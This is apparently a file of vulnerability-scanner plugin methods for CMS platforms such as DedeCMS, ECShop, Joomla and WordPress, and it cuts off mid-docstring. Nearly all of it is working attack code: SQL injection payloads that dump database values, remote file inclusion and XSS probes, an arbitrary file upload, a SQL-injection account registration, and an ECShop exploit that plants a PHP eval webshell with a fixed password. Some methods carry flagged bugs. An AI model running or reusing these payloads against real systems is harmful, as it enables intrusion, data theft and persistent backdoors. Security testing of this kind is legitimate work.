def verify(self) -> None:
    """Probe ``index.php?basePath=`` for remote file inclusion.

    ``self.target`` is first normalised to ``<target>/<base_path>``.  One
    GET is sent with forged browser headers and a 50 s timeout; the target
    is reported when the response body contains the fixed marker
    ``d4d7a6b8b3ed8ed86db2ef2cd728d8ec`` (md5 of ``3.1416`` according to
    the original author's note).  Every exception is caught and logged
    through ``self.output.info``.
    """
    self.target = self.target.rstrip(
        '/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        vul_url = arg + '/index.php?basePath=http://baidu.com/robots.txt'
        # Forged HTTP headers.  NOTE(review): Host is overridden with an
        # unrelated name, so name-based virtual hosting on the target may
        # route this request to a different site — confirm per target.
        httphead = {
            'Host': 'www.google.com',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive'
        }
        resp = requests.get(vul_url, headers=httphead, timeout=50)
        # md5('3.1416') = d4d7a6b8b3ed8ed86db2ef2cd728d8ec
        match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.text)
        # Presence of the marker is taken as proof that the inclusion worked.
        if match:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def exploit(self) -> None:
    """Enumerate daily log files under ``/Data/Log/`` for calendar year 2018.

    Walks from 2018-01-01 to 2018-12-31, advancing one day *before* each
    request (so 01-01 itself is never requested), names the file
    ``YY_MM_DD.log`` and stops at the first URL that answers HTTP 200 with
    ``INFO:`` in the body.  Unlike the ``verify`` methods in this file,
    ``self.target`` is used as-is — ``base_path`` is not appended.
    Exceptions are logged and swallowed.
    """
    try:
        self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        # Hard-coded search window: nothing outside 2018 is ever tried.
        start = '2018-01-01'
        end = '2018-12-31'
        datestart = datetime.datetime.strptime(start, '%Y-%m-%d')
        dateend = datetime.datetime.strptime(end, '%Y-%m-%d')
        while datestart < dateend:
            datestart += datetime.timedelta(days=1)
            # '2018_01_02'[2:10] -> '18_01_02'
            payload = datestart.strftime('%Y_%m_%d')[2:10]
            vul_url = arg + '/Data/Log/' + payload + '.log'
            # NOTE(review): no timeout — a stalled target blocks the whole loop.
            response = requests.get(vul_url)
            if response.status_code == 200 and 'INFO:' in response.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,获取的漏洞url地址为{url}'.format(
                        target=self.target, name=self.vuln.name, url=vul_url))
                break
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check the ``com_kunena`` user-list search for a UNION-based SQL injection.

    Appends a UNION SELECT evaluating ``md5(3.1415)`` to the ``search``
    parameter and reports the target when the digest
    ``63e1f04640e83605c1d177544a5a0488`` appears in the response body.
    The request uses a browser-like header set and a 50 s timeout;
    exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip(
        '/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        # Endpoint under test
        exploit = '/index.php?option=com_kunena&func=userlist&search='
        # UNION payload that makes the server compute md5(3.1415)
        payload = "%' and 1=2) union select 1, 1,md5(3.1415),1,1,1,1,1,1,1,0,0,0,1,1-- ;"
        # Full request URL (payload concatenated without URL-encoding)
        vulurl = arg+exploit+payload
        # Custom HTTP headers
        httphead = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive'
        }
        # Send the request
        resp = requests.get(url=vulurl, headers=httphead, timeout=50)
        # Look for the marker (md5(3.1415) = 63e1f04640e83605c1d177544a5a0488)
        if '63e1f04640e83605c1d177544a5a0488' in resp.text:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Run two error-based SQL injection probes and report each one that hits.

    Probe 1 is a GET on ``/?m=info.detail&id=1 AND (...)``; probe 2 POSTs a
    ``key`` field to ``/?m=city.getSearch&index=xx``.  Both payloads wrap
    ``CURRENT_USER()`` between ``~~~`` markers so that an echoed database
    error can be picked out with ``~~~(.*?)~~~``.  Each probe with a match
    is reported separately together with its URL.  Neither request sets a
    timeout.  Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Probe 1: GET parameter `id`
        payload = "/?m=info.detail&id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
        resp = requests.get(self.target + payload)
        re_result = re.findall(r'~~~(.*?)~~~', resp.text, re.S | re.I)
        # Probe 2: POST field `key`
        vulurl1 = "%s/?m=city.getSearch&index=xx" % self.target
        payload1 = {
            "key": "xxx' AND (SELECT 7359 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xx'='xx"
        }
        resp1 = requests.post(vulurl1, data=payload1)
        re_result1 = re.findall(r'~~~(.*?)~~~', resp1.text, re.S | re.I)
        # One report per probe that echoed the marker
        if re_result:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
                    target=self.target, name=self.vuln.name, url=self.target + payload))
        if re_result1:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
                    target=self.target, name=self.vuln.name, url=vulurl1))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Try five SQL injection probes that all expect ``md5(123)`` in the reply.

    Each entry in ``payloads`` is appended to the target and fetched; a
    response with HTTP 200 and ``202cb962ac59075b964b07152d234b70`` in the
    body is reported with its URL.  ``payloads`` is a ``set`` literal, so
    the probe order is not fixed between runs.  Exceptions are logged and
    swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        payloads = {
            '/ajax.php?act=check_field&field_name=a%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(123),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#',
            '/link.php?act=go&city=sanming&url=secer%27)%20and%20(updatexml(1,concat(0x3a,(select%20concat(md5(123))%20from%20jytuan_admin%20limit%201)),1))%23',
            '/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(123),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa',
            "/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(md5(123)) from easethink_admin limit 1)),1))#",
            "/sms.php?act=do_unsubscribe_verify&mobile=a' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(123),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#"
        }
        for payload in payloads:
            # NOTE(review): `arg` is reassigned on every iteration, so from
            # the second probe on the URL carries all previous payloads
            # appended one after another.
            target_url = arg = arg + payload
            req = requests.get(target_url)
            # md5(123) = 202cb962ac59075b964b07152d234b70
            if req.status_code == 200 and "202cb962ac59075b964b07152d234b70" in req.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                        target=self.target, name=self.vuln.name, url=target_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Look for PHP full-path disclosure in a fixed list of add-on/plugin files.

    Each path in ``payloads`` is requested directly; the response is matched
    against `` in <b>(.*)</b> on line`` (the shape of a PHP warning line that
    includes the script's filesystem path).  Every matching path triggers a
    report — the loop does not stop at the first hit.  Exceptions are
    logged and swallowed.
    """
    self.target = self.target.rstrip(
        '/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        payloads = [
            '/api/addons/zendcheck.php',
            '/api/addons/zendcheck52.php',
            '/api/addons/zendcheck53.php',
            '/source/plugin/mobile/api/1/index.php',
            '/source/plugin/mobile/extends/module/dz_digest.php',
            '/source/plugin/mobile/extends/module/dz_newpic.php',
            '/source/plugin/mobile/extends/module/dz_newreply.php',
            '/source/plugin/mobile/extends/module/dz_newthread.php',
        ]
        # Compiled once; matches the path portion of a PHP error line
        pathinfo = re.compile(r' in <b>(.*)</b> on line')
        for payload in payloads:
            verify_url = self.target + payload
            req = requests.get(verify_url)
            match = pathinfo.findall(req.text)
            if match:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常:{}'.format(e))
def verify(self) -> None:
    """Check DedeCMS ``member/resetpassword.php`` for the safe-question bypass.

    Sends ``dopost=safequestion&safequestion=0.0&safeanswer=&id=1`` and
    reports the target when ``key=`` occurs in the response.  The original
    notes say an account must be registered and logged in first, but
    ``cookies`` is left empty (the loading code is a string literal, not
    executed), so the request goes out unauthenticated.  Exceptions are
    logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Reference: https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_V5.7_
        # Original note: register an account, log in, then visit the URL below.
        # Cookies: intentionally empty; the parsing snippet below is inert.
        cookies = {}
        ''' raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx' for line in raw_cookies.split(';'): key,value=line.split('=',1)#1代表只分一次,得到两个数据 cookies[key]=value '''
        payload = "/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1"
        url = self.target + payload
        r = requests.get(url, cookies=cookies)
        # 'key=' in the reply is the indicator used for a reset token leak
        if 'key=' in r.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check ``flashmediaelement.swf`` (WordPress 4.5.1 XSS) using an m3u8 playlist.

    The query string points the SWF at a playlist hosted on a site outside
    the target (see ``payload``).  The target is reported when the response
    is HTTP 200, contains ``alert(2)`` and one of ``>17<`` / ``>32<``.
    NOTE(review): the result therefore depends on that external host being
    reachable from wherever the playlist is fetched — confirm before
    relying on a negative.  Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip(
        '/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # An M3U8 playlist names the fragment URLs to load; the original
        # author's playlist (exp.m3u8) is reproduced as an inert string:
        ''' #EXTM3U #EXT-X-TARGETDURATION:10 #EXTINF:10, http://www.baidu.com/a.ts\")+alert(2))}catch(e){}// '''
        payload = "/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfu%xnction=console.log&isvi%xdeo=true&auto%xplay=true&fi%xle=http://midzer0.github.io/2016/wordpress-4.5.1-xss/exp.m3u8"
        url = self.target + payload
        r = requests.get(url)
        if r.status_code == 200 and 'alert(2)' in r.text:
            if ('>17<' in r.text) or ('>32<' in r.text):
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check ``manager/admin_ajax.php`` for stored XSS in the third-party config.

    POSTs a ``device_name`` containing ``<script>alert('cscan')</script>``
    to the save endpoint, then GETs ``manager/api_manager.php`` and reports
    when the injected tag is rendered inside a ``<td>``.  Both requests
    carry the ``cookie`` option as a raw ``Cookie`` header (an authenticated
    admin session is required).  A positive result leaves the injected
    entry in the target's configuration.  Exceptions are logged and
    swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        # NOTE(review): `{pre}` is sent literally — this string is never
        # passed through .format(), so the table prefix is not substituted.
        payload = "/manager/admin_ajax.php?action=save&tab={pre}thirdpart_config"
        # The cookie must belong to a logged-in session; it is read from the
        # scanner's `cookie` option rather than being hard-coded.
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': self.get_option('cookie')
        }
        data = '''id=&flag=add&device_name=%3Cscript%3Ealert%28%27cscan%27%29%3C%2Fscript%3E&api_url=&logo_url=&app_key='''
        vul_url = arg + payload
        # Step 1: store the payload
        response = requests.post(vul_url, headers=headers, data=data)
        payload2 = "/manager/api_manager.php"
        vul_url2 = arg + payload2
        # Step 2: check whether the stored value is echoed unescaped
        response2 = requests.get(vul_url2, headers=headers)
        if response2.status_code == 200 and "<td><script>alert('cscan')</script></td>" in response2.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check ``member/special.php`` for SQL injection through ``TB_pre``.

    Sends an ``updatexml``-based payload that makes the server compute
    ``md5(c)`` and reports the target when
    ``4a8a08f09d37b73795649038408b5f33`` appears in the response.  The
    original notes require a registered user with a topic (``id=12``);
    ``cookies`` is nevertheless left empty, so the request is sent without
    a session.  Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Original note: register a user, create a topic and note its ID first.
        # Cookies: intentionally empty; the parsing snippet below is inert.
        cookies = {}
        ''' raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx' for line in raw_cookies.split(';'): key,value=line.split('=',1)#1代表只分一次,得到两个数据 cookies[key]=value '''
        payload = "/member/special.php?job=show_BBSiframe&type=myatc&id=12&TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0x7e,((select concat(username,0x5c,md5(c)) from qb_members limit 0,1))),0) %23"
        url = self.target + payload
        r = requests.get(url, cookies=cookies)
        # md5('c') = 4a8a08f09d37b73795649038408b5f33
        if '4a8a08f09d37b73795649038408b5f33' in r.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check the editor's ``img_save.asp`` for unrestricted file upload.

    POSTs a hand-built multipart body carrying a ``123.cer`` file whose
    content is ``testvul``, extracts the stored name from a
    ``getimg('<digits>.cer')`` fragment in the reply, then fetches it from
    ``/library/editornew/Editor/NewImage/`` and reports when the body
    contains ``testvul``.  A positive result leaves the uploaded file on
    the target; the report message names its URL and asks for its removal.
    Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        vun_url = arg + "/library/editornew/Editor/img_save.asp"
        # Raw multipart/form-data body (boundary WebKitFormBoundaryNjZKAB66SVyL1INA)
        data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert testvul ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- '''
        r = requests.post(vun_url, data=data)
        res = r.text
        # The server echoes the stored file name as getimg('NNN.cer')
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', res)
        if match:
            verify_url = arg + \
                "/library/editornew/Editor/NewImage/"+match.group(1)
            rg = requests.get(verify_url)
            # Upload confirmed only if the stored file serves our marker back
            if rg.status_code == 200 and "testvul" in rg.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞;\n在该验证过程中上传了文件地址为:{url},请及时删除。'.
                    format(target=self.target, name=self.vuln.name, url=verify_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def exploit(self) -> None:
    """Attempt code execution via a crafted ``Referer`` on ``user.php?act=login``.

    Builds a PHP snippet, wraps it base64-then-hex inside a serialized
    array string that is sent as the ``Referer`` header, then POSTs field
    ``111`` to ``<target>/<letter>.php`` and reports when md5('c')
    (``4a8a08f09d37b73795649038408b5f33``) comes back.  A successful run
    leaves that PHP file on the target; the report message includes its
    location and the POST field name.  Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip(
        '/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的漏洞利用'.format(
            target=self.target, vuln=self.vuln))
        # Single-character file name drawn from chr(96)..chr(122)
        randstr = chr(random.randint(96, 122))
        filename_poc = randstr + '.php'
        payload = "file_put_contents('(unknown)','<?php eval($_POST[111]); ?>')".format(filename=filename_poc)
        self.output.info("随机payload生成成功")
        # Layer 1: base64 inside an assert() wrapper
        payload_base64 = '''{$asd'];assert(base64_decode('%s'));//}xxx''' %base64.b64encode(payload.encode('utf-8')).decode('ascii')
        self.output.info("使用Base64加密payload")
        # Layer 2: hex so it can be embedded as a 0x... literal
        payload_hex = binascii.b2a_hex(payload_base64.encode('utf-8')).decode('ascii')
        self.output.info("使用十六进制加密payload")
        # Serialized-array string carried in the Referer header
        refer = '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x%s,10-- -";s:2:"id";s:3:"'/*";}''' % payload_hex
        headers = {
            'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Referer': refer
        }
        url_paylpad = self.target + "/user.php?act=login"
        # Response of the trigger request is not inspected
        r = requests.get(url_paylpad,headers=headers)
        self.output.info("正在进行漏洞利用...")
        poc_url = self.target + filename_poc
        post_data = {"111": "echo md5(c);"}
        r2 = requests.post(poc_url, data=post_data)
        # md5('c') = 4a8a08f09d37b73795649038408b5f33
        if '4a8a08f09d37b73795649038408b5f33' in r2.text:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞,webshell地址:{webshell},密码:111'.format(
                target=self.target, name=self.vuln.name, webshell=self.target + filename_poc))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Try three ``updatexml``-based SQL injection probes on ``?m=product``/``?m=shop``.

    Each probe asks the database for ``md5(3.14)``; a response with HTTP 200
    containing ``4beed3b9c4a886067de0e3a094246f7`` (a 31-character prefix of
    the digest) is reported with its URL.  All matching probes are reported.
    Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Reference: http://www.wooyun.org/bugs/wooyun-2014-080751
        payloads = [
            '?m=product&s=list&key=%27%20and%201=updateXml%281,concat%280x5c,md5%283.14%29%29,1%29%23',
            '?m=shop&id=&province=%27%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23',
            '?m=product&s=list&ptype=0%27%20%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23'
        ]
        for payload in payloads:
            verify_url = self.target + payload
            req = requests.get(verify_url)
            # Prefix match on md5(3.14)
            if req.status_code == 200 and "4beed3b9c4a886067de0e3a094246f7" in req.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                        target=self.target, name=self.vuln.name, url=verify_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check ``extpmsPdtInfo.do?action=list`` for reflected XSS in ``value(keyword)``.

    Sends a GET that also carries a form body (``data=``) with a script tag
    inside ``value(keyword)`` and reports the target when the marker
    ``/Cscan-hyhmnn/`` is echoed.  Several headers are hard-coded from a
    captured request: ``Content-Length`` is fixed at ``234`` regardless of
    the body actually sent, ``Cookie`` holds a stale session id, and
    ``Host`` is set to ``self.target``, which is a URL rather than a host
    name.  Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        payload = "/extpmsPdtInfo.do?action=list"
        # Headers copied from a captured request; see docstring for caveats
        headers = {
            'Content-Length': '234',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Referer': 'http://**.**.**.**:80/zgLoginAction.do',
            'Cookie': 'JSESSIONID=A5C98CCF4A7C81CC4A3438C86412A367; rayvwulm=1',
            'Host': self.target,
            'Connection': 'Keep-alive',
            'Accept-Encoding': 'gzip,deflate',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',
            'Accept': '*/*'
        }
        # The whole query string is stuffed into the value of one form field
        data = {
            'BRAND': "&CHIP=&CONSUME_GROUP=&input=1&OS=&PDT_TYPE=&searchType=&SKSD=&value(keyword)=1'%22()%26%25<acx><ScRiPt%20>alert(“/Cscan-hyhmnn/”)</ScRiPt>&value(orderByStr)=&value(SALE_PRICE)=&value(SCREEN_SIZE)=&value(select_value)=&value(withPeomote)="
        }
        url = self.target + payload
        # NOTE(review): a GET with a request body — whether the server reads
        # it is target-specific.
        response = requests.get(url, headers=headers, data=data)
        if "/Cscan-hyhmnn/" in response.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常:{}'.format(e))
def exploit(self) -> None:
    """Register an account through DedeCMS ``member/reg_new.php`` via SQL injection.

    Builds a random ``admin_<n>`` user name used for every field and sends
    the registration as a GET whose ``safequestion`` value closes the
    INSERT and adds a second row.  Success is HTTP 200 with both the random
    name and ``注册成功`` in the body; a successful run leaves the created
    account on the target, and the report asks for it to be deleted.
    ``verification_code`` is hard-coded to ``aaaa`` and must match the
    target's captcha (see the original note).  Exceptions are logged and
    swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Original note: replace this with the captcha value for your run.
        verification_code = 'aaaa'
        # Random registration identity
        randstr = 'admin_' + str(random.randint(1, 10000))
        payload = '/dede/member/reg_new.php'
        data = "?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid={userid}&uname={uname}&userpwd={userpwd}&userpwdok={userpwdok}&email={email}%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','*****@*****.**','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode={verification_code}&agree=".format(
            userid=randstr, uname=randstr, userpwd=randstr, userpwdok=randstr, email=randstr, verification_code=verification_code)
        # NOTE(review): `data` is never appended to `url`; only the bare
        # reg_new.php path is requested here.
        url = self.target + payload
        r = requests.get(url)
        if r.status_code == 200 and randstr in r.text and '注册成功' in r.text:
            # NOTE(review): the keyword is spelled `passwoed`, so `{password}`
            # raises KeyError and this report is never emitted — the except
            # branch logs it as 执行异常 instead.
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞,已注册会员用户名为:{uname},密码为:{password},请及时删除!'
                .format(target=self.target, name=self.vuln.name, uname=randstr, passwoed=randstr))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check ``com_timereturns`` ``id`` for error-based SQL injection.

    The payload uses the ``FLOOR(RAND(0)*2) ... GROUP BY`` duplicate-key
    trick so that the database error echoes ``md5(1)``; the target is
    reported when ``c4ca4238a0b923820dcc509a6f75849b`` is in the response.
    Browser-like headers and a 50 s timeout are used.  Exceptions are
    logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        # Payload (floor/rand error-echo technique)
        payload = "1' AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),"\
            "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
        # Vulnerable page
        exploit = '/index.php?option=com_timereturns&view=timereturns&id='
        # Full request URL
        vulurl = arg + exploit + payload
        # Custom HTTP headers
        httphead = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive'
        }
        # Send the request
        resp = requests.get(url=vulurl, headers=httphead, timeout=50)
        # Look for the marker (md5(1) = c4ca4238a0b923820dcc509a6f75849b)
        if 'c4ca4238a0b923820dcc509a6f75849b' in resp.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check the admin ``groups_manage`` search for SQL injection via ``ttable``.

    This is a back-end (post-login) check: the original notes say a valid
    admin cookie must be supplied.  As written, ``cookie`` is an unused
    empty string and the header sent is the literal ``{'cookie': 'cookie'}``,
    so the request is effectively unauthenticated.  The payload makes the
    database echo ``md5(233)``; the target is reported when
    ``e165421110ba03099a1c0393373c5b43`` is in the response.  Exceptions
    are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        # Back-end vulnerability: login and a captured cookie are required
        # (see the accompanying PDF, per the original author).
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # this poc need to login, so special cookie for target must be included in http headers.
        # NOTE(review): `cookie` is never used; the header below sends the
        # literal string 'cookie' as the Cookie value.
        cookie = ''
        header = {'cookie': 'cookie'}
        payload = (
            "/admin.php?adminjob=apps&admintype=groups_manage&action=argument&keyword=1"
            + "&ttable=/**/tm ON t.tid=tm.tid LEFT JOIN pw_argument a ON t.tid="
            + "a.tid LEFT JOIN pw_colonys c ON a.cyid=c.id WHERE (SELECT 1 FROM (select count(*),concat"
            + "(floor(rand(0)*2),CONCAT(0x3a,(SELECT md5(233))))a from information_schema.tables group by a)b)%23"
        )
        verify_url = self.target + payload
        req = requests.get(verify_url, headers=header)
        # md5(233) = e165421110ba03099a1c0393373c5b43
        if 'e165421110ba03099a1c0393373c5b43' in req.text:
            #args['success'] = True
            #args['poc_ret']['vul_url'] = verify_url
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Try two SQL injection probes on ``order.php?id=`` expecting ``md5(123)``.

    Both payloads wrap the digest between ``qgveq`` / ``qkagq`` markers;
    a response with HTTP 200 containing ``202cb962ac59075b964b07152d234b70``
    is reported with its URL.  A fixed ``Cookie`` header
    (``shoppingcart=a,username=a``) is sent with each request.  The nested
    ``getString`` helper would extract the marked value from a
    ``Duplicate entry`` error but is never called.  Exceptions are logged
    and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))

    def getString(res):
        """Return the ``Duplicate entry 'qgveq|...|qkagq`` match from *res*, else ``""``.

        Unused by ``verify``.  NOTE(review): the pattern is not a raw
        string (``\\|`` is an invalid escape) and ``!= None`` should be
